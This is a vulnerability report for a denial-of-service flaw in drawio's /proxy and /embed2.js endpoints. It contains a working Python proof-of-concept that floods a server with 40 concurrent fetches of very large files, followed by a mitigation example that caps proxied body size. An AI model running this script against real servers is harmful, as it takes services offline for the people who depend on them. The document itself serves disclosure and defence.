Headline
CVE-2023-3398: proxying Big files leads to potential DOS in drawio
Denial of Service in GitHub repository jgraph/drawio prior to 18.1.3.
Description
Consider the following script:
exploit.py
Put your address in place of drawio_docker_instace, and big_file_address should serve a big image file (> 250 MB).
from multiprocessing import Process
import requests

def fun():
    try:
        requests.get("http://drawio_docker_instace/embed2.js?fetch=http://big_file_address/1.jpg")
        #requests.get("http://drawio_docker_instace/proxy?url=http://big_file_address/1.jpg")
        print("OK")
    except:
        print("error from server")

def main():
    for i in range(1,40):
        p = Process(target=fun, args=())
        p.start()

if __name__ == '__main__':
    main()
I uploaded forty 250MB photos at the same time, and the server hung up (I tested it on the UpCloud basic server plan). Both /proxy and /embed2.js were vulnerable to DoS, and /embed2.js was more vulnerable, as I saw in docker status; you can check it yourself with my POC.py file.
Proof of Concept
The PoC is for the /embed2.js endpoint; for the /proxy endpoint we should increase the number of simultaneous processes. https://drive.google.com/file/d/1p52S-Rcp0p_5od8NUtz4DHpte4EZj6Ks/view?usp=sharing
Impact
High damage on availability of the server. In my tests the docker instance stopped working; because drawio ran in the same docker container as the mentioned methods, the whole application can be damaged by this attack, so I prefer to set the availability of CVSS to high.
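One mitigation for the class of bug reported above, as an added example that is not drawio's own code or its fix: a proxy fetch that refuses upstream bodies over a size cap, first by Content-Length and then by counting streamed bytes, since the header may be absent or wrong. The cap value and the function names are assumptions.

```python
# Added example, not drawio code: bound the bytes a /proxy-style fetch will relay.
import io
from typing import BinaryIO, Optional

MAX_PROXY_BYTES = 250 * 1024 * 1024  # assumed cap; set what the deployment can afford
CHUNK = 64 * 1024

class ProxyLimitExceeded(Exception):
    """Raised when an upstream body grows past the configured cap."""

def reject_by_content_length(headers: dict, limit: int = MAX_PROXY_BYTES) -> bool:
    """Cheap pre-check: refuse before reading a body when the upstream declares
    a size over the limit. A missing or malformed header is simply not trusted."""
    raw = headers.get("Content-Length")
    try:
        return raw is not None and int(raw) > limit
    except ValueError:
        return False

def copy_bounded(src: BinaryIO, dst: BinaryIO, limit: int = MAX_PROXY_BYTES) -> int:
    """Stream src into dst and abort once more than `limit` bytes have arrived,
    so an absent or lying Content-Length cannot bypass the cap."""
    total = 0
    while True:
        chunk = src.read(CHUNK)
        if not chunk:
            return total
        total += len(chunk)
        if total > limit:
            raise ProxyLimitExceeded(f"upstream body exceeded {limit} bytes")
        dst.write(chunk)

def proxy_fetch(headers: dict, body: BinaryIO, limit: int = MAX_PROXY_BYTES) -> Optional[bytes]:
    """Relay an upstream response; returns None when the cap rejects it."""
    if reject_by_content_length(headers, limit):
        return None
    out = io.BytesIO()
    try:
        copy_bounded(body, out, limit)
    except ProxyLimitExceeded:
        return None
    return out.getvalue()

def fake_upstream(data: bytes) -> BinaryIO:
    """Constructed stand-in for an upstream HTTP body, used in the test."""
    return io.BytesIO(data)
```

A per-instance cap on concurrent proxy fetches is the complementary control for the parallel-request part of the report; in production the body would also be streamed to the client rather than buffered.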